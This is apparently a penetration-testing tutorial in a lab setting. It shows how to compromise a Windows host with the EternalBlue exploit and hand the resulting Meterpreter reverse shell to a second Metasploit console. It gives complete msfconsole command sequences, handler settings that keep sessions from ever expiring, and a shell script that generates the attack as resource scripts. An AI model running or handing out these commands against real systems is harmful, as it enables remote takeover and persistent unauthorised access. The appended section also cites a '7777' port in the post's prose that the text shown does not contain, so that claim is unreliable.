This post shows how to hand a Meterpreter session from one Metasploit (MSF) instance to another: from an existing Meterpreter session, spawn a second Meterpreter that calls back to a handler running in a different msfconsole.
First, get a shell with ms17_010 (EternalBlue). 192.168.50.146 is the victim machine and 192.168.50.130 is the Kali box. Select the module first, then set its options (AutoRunScript migrates out of the exploited process as soon as the session comes in):
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 5577
set autorunscript post/windows/manage/migrate name=services.exe
exploit -j -z
Next, in a second msfconsole, start a listener on port 3333 (the msfconsole `handler` command is a shortcut for exploit/multi/handler; the port and payload must match what is set in the next step):
handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp
Then, back in the first console, run payload_inject against the EternalBlue session (here session 1; check the number with sessions -l). DisablePayloadHandler stops this console from starting its own listener on 3333, so the callback goes to the second console:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run
Once the new session has arrived in the second console, the original session obtained through ms17_010 can be closed.
The example above uses reverse_tcp; reverse_http works the same way.
In the second msfconsole, start a listener on port 18080 (ExitOnSession false keeps the handler running after the first session; the two timeouts set to 0 stop the HTTP session from expiring or being dropped on a missed check-in):
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0
set SessionCommunicationTimeout 0
exploit -j -z
Then spawn the new session from the old one in the first console:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run
After run it takes roughly 15-20 seconds for the new session to be fully established, because the HTTP Meterpreter has to check in with the handler rather than holding an open TCP connection.
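The whole procedure above is three blocks of msfconsole commands typed into two consoles, and the one thing that silently breaks it is the two sides disagreeing on payload, LHOST or LPORT (the post's own prose says "listen on 7777" while the commands use 18080). The following script is an added example, not code from the original post or from Metasploit: it emits the three blocks as msfconsole resource scripts (loaded with `msfconsole -r file.rc`) from a single set of variables and refuses to write them unless the handler and payload_inject scripts agree. The addresses, ports and session number are the post's lab values and are assumptions; change them for your own lab.

```shell
#!/bin/sh
# Added example, not part of the original post: generate a matched pair of
# msfconsole resource scripts for handing a Meterpreter session from console A
# to console B, and check that the handler side and the payload_inject side
# agree on PAYLOAD / LHOST / LPORT before anything is written.
# All values below are assumed lab values taken from the post.

LHOST=192.168.50.130                 # attacker (Kali) address
VICTIM=192.168.50.146                # EternalBlue target
EB_LPORT=5577                        # port for the initial x64 session
NEW_LPORT=18080                      # port console B listens on
NEW_PAYLOAD=windows/meterpreter/reverse_http
SESSION=1                            # id of the EternalBlue session (sessions -l)

# Console A: take the box with MS17-010 and migrate out of the exploited
# process as soon as the session arrives.
gen_exploit_rc() {
  cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $VICTIM
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT $EB_LPORT
set AutoRunScript post/windows/manage/migrate NAME=services.exe
exploit -j -z
EOF
}

# Console B: the handler that catches the spawned session. ExitOnSession false
# keeps it listening; the zero timeouts stop the HTTP session from expiring.
gen_handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $NEW_PAYLOAD
set LHOST $LHOST
set LPORT $NEW_LPORT
set ExitOnSession false
set SessionExpirationTimeout 0
set SessionCommunicationTimeout 0
exploit -j -z
EOF
}

# Console A again: inject the new payload from the existing session.
# DisablePayloadHandler stops console A from opening its own listener on
# NEW_LPORT, which would otherwise compete with console B for the callback.
gen_inject_rc() {
  cat <<EOF
use exploit/windows/local/payload_inject
set SESSION $SESSION
set PAYLOAD $NEW_PAYLOAD
set LHOST $LHOST
set LPORT $NEW_LPORT
set DisablePayloadHandler true
set PrependMigrate true
run
EOF
}

# rc_get RC_TEXT OPTION -> value given to "set OPTION value" (case-insensitive)
rc_get() {
  printf '%s\n' "$1" | awk -v key="$2" '
    tolower($1) == "set" && tolower($2) == tolower(key) { print $3 }'
}

# Return 0 only if the handler and inject scripts agree on payload, host and
# port; this is exactly the mismatch the post's "listen on 7777" text had.
check_pair() {
  h=$(gen_handler_rc)
  i=$(gen_inject_rc)
  for opt in PAYLOAD LHOST LPORT; do
    [ "$(rc_get "$h" "$opt")" = "$(rc_get "$i" "$opt")" ] || {
      echo "handler/inject mismatch on $opt" >&2
      return 1
    }
  done
  return 0
}

# write_rcs DIR -> writes exploit.rc, handler.rc and inject.rc into DIR,
# but only after the consistency check passes.
write_rcs() {
  check_pair || return 1
  gen_exploit_rc >"$1/exploit.rc"
  gen_handler_rc >"$1/handler.rc"
  gen_inject_rc  >"$1/inject.rc"
}

# Usage: sh spawn_rc.sh write /tmp/rc
if [ "${1:-}" = "write" ]; then
  write_rcs "${2:-.}"
fi
```

Run order matters: console A loads exploit.rc and waits for the session; console B loads handler.rc and must be listening before console A loads inject.rc, otherwise the spawned Meterpreter's first callback has nothing to connect to (with reverse_http it will keep retrying, with reverse_tcp it will not). If the EternalBlue session is not session 1, change SESSION before generating inject.rc.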